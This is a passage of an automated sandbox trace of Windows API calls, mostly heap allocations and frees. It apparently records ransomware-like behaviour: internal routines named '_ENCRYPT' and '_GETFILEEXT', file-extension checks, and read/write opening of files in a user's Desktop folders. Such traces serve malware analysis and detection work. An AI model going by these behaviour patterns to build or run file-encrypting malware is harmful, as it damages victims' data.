(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb08 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.356] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.357] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.357] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.357] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.357] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.358] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.358] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.358] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.358] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.358] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.358] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.358] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x79c, lpOverlapped=0x0) returned 1 [0031.359] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.359] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x79c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.359] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0031.360] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.360] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.361] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.361] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.361] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.361] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.361] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.361] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.362] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.362] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\b9ol1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.362] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.363] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.364] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.364] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.364] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.364] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.364] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.364] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.364] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.365] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.365] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.365] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.365] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.365] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.365] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.365] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.365] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 